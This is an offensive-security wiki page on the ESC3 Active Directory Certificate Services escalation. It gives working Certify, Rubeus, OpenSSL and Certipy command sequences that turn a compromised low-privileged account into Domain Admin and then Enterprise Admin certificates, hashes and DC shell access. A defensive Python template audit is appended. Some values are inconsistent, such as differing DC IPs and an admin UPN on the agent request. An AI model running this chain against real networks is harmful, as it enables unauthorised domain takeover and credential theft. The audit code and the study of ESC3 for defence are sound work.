# ESC3

### What is ESC3?

ESC3 is an Active Directory Certificate Services (ADCS) privilege escalation technique that abuses the **Certificate Request Agent** (Enrollment Agent) EKU. When a template carrying this EKU is enrollable by a low-privileged user, that user receives a special *agent certificate* that authorises them to enrol in *any other certificate template* on behalf of any user, including Domain Administrator.

| Template 1: Enrollment Agent                                                         | Template 2: Target Template                                                                                        |
| ------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------- |
| **Certificate Request Agent**                                                        | **Client Authentication**                                                                                         |
| Grants the holder the ability to request certificates on behalf of other principals. | Permits authentication. Must require authorised signatures (set to 1) and the Certificate Request Agent EKU as issuance policy. |
| EKU: 1.3.6.1.4.1.311.20.2.1                                                          | EKU: 1.3.6.1.5.5.7.3.2                                                                                            |
| Enrollment rights for a controlled user                                              | Authorized Signatures Required = 1                                                                                |

{% hint style="info" icon="triangle-exclamation" %}
Both templates must have enrollment rights for a user you control. Without that, the attack chain cannot begin.
{% endhint %}

### Attack Flow

<figure><img src="/files/kf89XmS4ObMiflH7AiEN" alt=""><figcaption></figcaption></figure>

### Exploitation

{% tabs %}
{% tab title="Windows" %}
Step 1: Enumerate vulnerable templates

```cmd
Certify.exe find /vulnerable
```

Step 2: Request enrollment agent certificate (Template 1)

* Enrol in Template 1 to receive your enrollment agent certificate

```cmd
Certify.exe request ^
  /ca:<CA-Server>\<CA-Name> ^
  /template:<Template1-Name> ^
  /domain:<domain.com>
```

* Convert the output PEM to PFX using OpenSSL:

```cmd
openssl pkcs12 ^
  -in esc3-enrollmentAgent.pem ^
  -keyex ^
  -CSP "Microsoft Enhanced Cryptographic Provider v1.0" ^
  -export ^
  -out esc3-enrollmentAgent.pfx
```

Step 3: Request TGT for controlled user (optional but recommended)

* Get a TGT so subsequent requests use Kerberos auth

```cmd
Rubeus.exe asktgt ^
  /user:<your-user> ^
  /certificate:certstore.pfx ^
  /domain:<domain.com> ^
  /password:Passw0rd! ^
  /nowrap /ptt
```

Step 4: Enrol on behalf of Domain Admin (Template 2)

* Use agent cert to request a DA certificate via Template 2

```cmd
Certify.exe request ^
  /ca:<CA-Server>\<CA-Name> ^
  /template:<Template2-Name> ^
  /onbehalfof:domain\administrator ^
  /enrollcert:esc3-enrollmentAgent.pfx ^
  /enrollcertpw:Passw0rd! ^
  /domain:<domain.com>
```

* Convert this PEM too:

```cmd
openssl pkcs12 ^
  -in esc3-DAenrollment.pem ^
  -keyex ^
  -CSP "Microsoft Enhanced Cryptographic Provider v1.0" ^
  -export ^
  -out esc3-DAenrollment.pfx
```

Step 5: Request DA TGT and access DC

```cmd
Rubeus.exe asktgt ^
  /user:administrator ^
  /certificate:esc3-DAenrollment.pfx ^
  /password:Passw0rd! ^
  /domain:<domain.com> ^
  /ptt
```

```cmd
:: Verify access to DC
winrs -r:<dc-hostname> whoami
winrs -r:<dc-hostname> cmd
```

{% endtab %}

{% tab title="Linux" %}
Step 1: Enumerate with Certipy

* Find vulnerable ADCS templates (use compromised user hash)

```bash
certipy find \
  -vulnerable \
  -u certstore@cb.corp \
  -hashes aad3b435b51404eeaad3b435b51404ee:<NT-hash> \
  -target cb-ca.cb.corp \
  -stdout
```

Step 2: Request enrollment agent certificate (Template 1)

* Enrol in the agent template; `-upn` sets the certificate subject to the admin account

```bash
certipy req \
  -u certstore@cb.corp \
  -hashes aad3b435b51404eeaad3b435b51404ee:<NT-hash> \
  -target cb-ca.cb.corp \
  -dc-ip 172.16.67.1 \
  -ca 'CB-CA' \
  -template 'StoreDataRecovery-Agent' \
  -upn administrator@domain.corp \
  -out '/path/esc3-EnrollmentAgent-certipy'
```

Step 3: Enrol on behalf of Domain Admin (Template 2)

* Use the agent .pfx to request a cert on-behalf-of DA

```bash
certipy req \
  -u certstore@cb.corp \
  -hashes aad3b435b51404eeaad3b435b51404ee:<NT-hash> \
  -dc-ip 172.16.10.1 \
  -ca 'CB-CA' \
  -template 'StoreDataRecovery' \
  -on-behalf-of 'domain\administrator' \
  -pfx '/path/esc3-EnrollmentAgent-certipy.pfx' \
  -out '/path/esc3-DAEnrollment-certipy' \
  -timeout 30
```

Step 4: Authenticate as DA (UnPAC-the-Hash)

* Use the DA certificate to authenticate; Certipy dumps the NTLM hash via UnPAC-the-Hash

```bash
certipy auth \
  -pfx '/path/esc3-DAEnrollment-certipy.pfx'
```

***Bonus: Escalate to Enterprise Admin***

* Reuse the same agent cert; target cb\administrator (root domain)

```bash
certipy req \
  -u certstore@cb.corp \
  -hashes aad3b435b51404eeaad3b435b51404ee:<NT-hash> \
  -dc-ip 172.16.10.1 \
  -ca 'CB-CA' \
  -template 'StoreDataRecovery' \
  -on-behalf-of 'cb\administrator' \
  -pfx '/path/esc3-EnrollmentAgent-certipy.pfx' \
  -out '/path/esc3-EAEnrollment-certipy'

certipy auth -pfx '/path/esc3-EAEnrollment-certipy.pfx'
```

{% endtab %}
{% endtabs %}
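As an added defensive check (not part of this page, nor of Certify or Certipy), the following Python audit applies the two template conditions from the table above to template records, using the template names from the Linux steps as constructed sample data. The attribute names are the AD schema attributes for EKUs, required signatures and application policies; the set of principals treated as low-privileged is an assumption.

```python
# Added audit example, not part of the original page. Flags the two ESC3
# preconditions from the table above: a template issuing Certificate Request
# Agent certs to low-privileged principals (Template 1) and a client-auth
# template accepting one enrollment agent signature (Template 2). Attribute
# names follow the AD schema; the records and Enroll lists are constructed.
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"  # Certificate Request Agent EKU
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"              # Client Authentication EKU
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers"}  # assumed

def low_priv_can_enroll(template):
    """True if any low-privileged principal holds Enroll rights on the template."""
    return bool(set(template["enroll"]) & LOW_PRIV)

def is_agent_template(template):
    """Template 1: hands a Certificate Request Agent certificate to low-priv users."""
    return (CERT_REQUEST_AGENT in template["pKIExtendedKeyUsage"]
            and low_priv_can_enroll(template))

def is_target_template(template):
    """Template 2: client auth, one authorised signature, agent EKU as policy."""
    return (CLIENT_AUTH in template["pKIExtendedKeyUsage"]
            and template["msPKI-RA-Signature"] == 1
            and CERT_REQUEST_AGENT in template["msPKI-RA-Application-Policies"]
            and low_priv_can_enroll(template))

def find_esc3_chains(templates):
    """Return (agent template, target template) name pairs that form an ESC3 path."""
    agents = [t["name"] for t in templates if is_agent_template(t)]
    targets = [t["name"] for t in templates if is_target_template(t)]
    return [(a, b) for a in agents for b in targets]

def make_template(name, ekus, sigs, policies, enroll):
    """Build a constructed template record with only the attributes the audit reads."""
    return {"name": name, "pKIExtendedKeyUsage": ekus, "msPKI-RA-Signature": sigs,
            "msPKI-RA-Application-Policies": policies, "enroll": enroll}

SAMPLE_TEMPLATES = [  # constructed data; names borrowed from the Linux steps
    make_template("StoreDataRecovery-Agent", [CERT_REQUEST_AGENT], 0, [], ["Domain Users"]),
    make_template("StoreDataRecovery", [CLIENT_AUTH], 1, [CERT_REQUEST_AGENT], ["Domain Users"]),
    # Same agent EKU but enrollable only by admins: not a usable Template 1.
    make_template("EnrollmentAgent", [CERT_REQUEST_AGENT], 0, [], ["Domain Admins"]),
    # Client auth with no signature requirement: not an ESC3 target.
    make_template("User", [CLIENT_AUTH], 0, [], ["Domain Users"]),
]

if __name__ == "__main__":
    for agent, target in find_esc3_chains(SAMPLE_TEMPLATES):
        print(f"ESC3 path: {agent} -> {target}; restrict Enroll on {agent}")
```

In a real environment the records would come from an LDAP query of the certificate template objects in the Configuration partition; `certipy find -vulnerable` from Step 1 performs the equivalent check.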

